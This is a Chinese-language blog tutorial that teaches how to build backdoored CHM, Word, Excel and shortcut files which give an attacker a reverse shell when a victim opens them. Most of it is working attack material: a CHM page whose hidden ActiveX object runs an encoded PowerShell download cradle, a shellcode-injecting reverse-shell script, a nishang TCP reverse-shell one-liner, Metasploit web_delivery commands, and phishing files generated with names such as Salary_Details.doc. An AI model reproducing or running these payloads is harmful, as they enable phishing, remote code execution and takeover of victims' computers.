当文档遇上powershell

当文档遇上powershell

使用chm制作后门

目标:制作一个chm文件,Victim点击之后,反弹一个meterpreter

参考:https://evi1cg.me/archives/chm_backdoor.html

https://evi1cg.me/archives/121.html

膜evi1cg这个师傅 博客都是干货,

使用软件:EasyChm合成chm

首先建立目录 ,再顺便建立几个子目录和index.html文件

index.html内容,建议丰富一点,

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE html><html><head><title>书籍目录主页</title><head></head><body>
书籍目录.
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=0 height=0>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAxADUALgAxADUAOQAuADEANAA1AC4AOQAyAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQB2AC4AcABzADEAJwApADsAcgBlAHYACgA=",0,true)'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

其中

1
C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAxADUALgAxADUAOQAuADEANAA1AC4AOQAyAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQB2AC4AcABzADEAJwApADsAcgBlAHYACgA=

是我们在目标主机上执行的命令

base64编码那段使用的编码方法是

1
cat powershell.txt | iconv --to-code UTF-16LE |base64

还原就是,加载远程脚本执行的一个命令

1
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -ep bypass IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/powershell/rev.ps1');rev

其中

1
http://x.x.x.x/powershell/rev.ps1

内容是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
function rev {
$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
"@
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect('x.x.x.x', 2333) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
}

msf 监听 windows/meterpreter/reverse_tcp

x86:

1
powershell -nop -W Hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/powershell/rev.ps1');rev"

x64 必须:

1
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -nop -W Hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/powershell/rev.ps1');rev"

//64位不用C盘powershell执行显示SSL openssl错误 相关:http://kali.daxueba.net/?p=266

制作Word powershell后门

使用工具nishang制作,配合Invoke-PowerShellTcpOneLine.ps1与nc

打开Invoke-PowerShellTcpOneLine.ps1上面注释那段,如下

1
$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

修改ip以及自己要监听的端口,然后使用Invoke-Encode.ps1进行编码

1
2
3
4
PS G:\Desktop\tools\nishang\Utility> . .\Invoke-Encode.ps1
PS G:\Desktop\tools\nishang\Utility> Invoke-Encode -DataToEncode '$client = New-Object System.Net.Sockets.TCPClient("115.x.x.92",2333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' -IsString -PostScriptCommand
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt

已经生成了encodedcommand.txt,复制其中的内容,然后使用Out-Word.ps1生成word

encodedcommand.txt的内容

1
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('TZFda8IwFIbvB/sPh9KNhNnQj3WgZcJWtiEMlVXYhXgR24PtrFXsESfqf1/S2s6rHML78ZzEjPMMC4JnGOLeGs1/MCaIDiXhSgyRRLSOl0ilmITjsFIyw3F84fhd4Tz6ousaHdfzPB6YJW1RrlSQWUeKD6SoumM8mM4PhNPZzNRnqUS2EE++7/mnu6N9DvZpliNjZqbtdZD4QpmwWt8BuwP1KD6xWFDKOVgFgs2PgZlIksrHrhawJocNDuUKm1Um+EviJQoHg7ciXidZseAXPjU2Lbok05tgkcxlvNShGf5C3eD27x04wWhHVm2DK6kLFXljfABjHIGhTrbZJ1yMJaX6sg/GxaMKdfyUNBhemGa9XsVYsb1qJvbf0D6x+N5mhKzNUdzt3DxPq33Pd2XK+DlofiXM1yUyfnvzBw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

将其中有单引号的地方多加一个单引号,使用Out-Word.ps1

1
2
3
4
PS G:\Desktop\tools\nishang\Client> . .\Out-Word.ps1
PS G:\Desktop\tools\nishang\Client> Out-Word -Payload 'powershell -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(''TZFda8IwFIbvB/sPh9KNhNnQj3WgZcJWtiEMlVXYhXgR24PtrFXsESfqf1/S2s6rHML78ZzEjPMMC4JnGOLeGs1/MCaIDiXhSgyRRLSOl0ilmITjsFIyw3F84fhd4Tz6ousaHdfzPB6YJW1RrlSQWUeKD6SoumM8mM4PhNPZzNRnqUS2EE++7/mnu6N9DvZpliNjZqbtdZD4QpmwWt8BuwP1KD6xWFDKOVgFgs2PgZlIksrHrhawJocNDuUKm1Um+EviJQoHg7ciXidZseAXPjU2Lbok05tgkcxlvNShGf5C3eD27x04wWhHVm2DK6kLFXljfABjHIGhTrbZJ1yMJaX6sg/GxaMKdfyUNBhemGa9XsVYsb1qJvbf0D6x+N5mhKzNUdzt3DxPq33Pd2XK+DlofiXM1yUyfnvzBw=='')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();'
Saved to file G:\Desktop\tools\nishang\Client\Salary_Details.doc
0

已经成功,服务端监听 即可反弹一个powershell,在启用宏的计算机上没有任何提示,未启用宏的计算机会有启用宏的提示:

1
nc -lvv -p port

制作Excel powershell后门

设置msf监听并启动在线脚本服务供远程加载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2 //选择2name 就是powershell
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set URip
set URipATH set URipORT
msf exploit(web_delivery) > set URIPATH / //设置根目录
URIPATH => /
msf exploit(web_delivery) > set LHOST 115.x.x.92 //服务器ip
LHOST => x.x.x.x
msf exploit(web_delivery) > set reverselistenerbindaddress 127.0.0.1 //msf运行本地ip
reverselistenerbindaddress => 127.0.0.1
msf exploit(web_delivery) > run
[*] Exploit running as background job.
msf exploit(web_delivery) >
[*] Started reverse TCP handler on 127.0.0.1:4444 //4444端口可用set lport 6666设置
[*] Using URL: http://0.0.0.0:8080/ //8080端口可用set SRVPORT 8081设置
[*] Local IP: http://192.168.1.100:8080/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $s=new-object net.webclient;$s.proxy=[Net.WebRequest]::GetSystemWebProxy();$s.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $s.downloadstring('http://115.x.x.92:/');

注:举一反三

1
2
3
4
5
6
此处的作用是自己设一个web提供脚本并监听,跟着这个道理推,我们想到这个web服务提供脚本那自己也可以另外做啊,
如,我在我的服务器放一个脚本如下:http://115.x.x.92/powershell/rev.ps1
msf则监听:handle payload=windows/meterpreter/reserve_tcp
这时候我们可以将http://115.x.x.92/powershell/rev.ps1 这个作为服务做一下左右的钓鱼后门了
比如excle的:Out-Excel -PayloadURL http://115.x.x.92/powershell/rev.ps1 -OutputFile pshExcel.xls

将本地8080转发到公网ip:8080,本地4444转发到公网ip:4444,外部执行如下命令可直接得到shell

1
2
3
4
5
powershell.exe -nop -w hidden -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://公网ip:8080/');
//可简化为
powershell.exe -nop -w hidden -c $K=new-object net.webclient;IEX $K.downloadstring('http://115...92:2333/');
//或者
powershell.exe -nop -w hidden -c iex (New-Object Net.WebClient).DownloadString('http://115...92:8080')

这里使用Out-Excel.ps1制作excel钓鱼文件

1
2
3
PS G:\Desktop\tools\nishang\Client> . .\Out-Excel.ps1
PS G:\Desktop\tools\nishang\Client> Out-Excel -PayloadURL http://115.x.x.92:8080/ -OutputFile pshExcel.xls
Saved to file pshExcel.xls

打开pshExcel.xls即可获得meterpreter了

制作chm powershell后门 会弹黑框

直接使用上面的use exploit/multi/script/web_delivery监听设置

使用脚本

1
2
3
PS G:\Desktop\tools\nishang\Client> . .\Out-CHM.ps1
PS G:\Desktop\tools\nishang\Client>Out-CHM -PayloadURL http://192.168.52.129:8080/ -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
//其中-HHCPath 指定用什么目录的文件来制作chm文档

缺点是会弹黑框 简易使用上面第一种方法

制作快捷方式 powershell后门

直接使用上面的use exploit/multi/script/web_delivery监听设置

使用脚本

1
2
PS G:\Desktop\tools\nishang\Client> . .\Out-Shortcut.ps1
Out-Shortcut -PayloadURL http://115.x.x.92:8080 -HotKey 'F3' -Icon 'notepad.exe'

其中PayloadURL为web_delivery服务地址,Icon为快捷方式的图标,HotKey为快捷键。

就可以了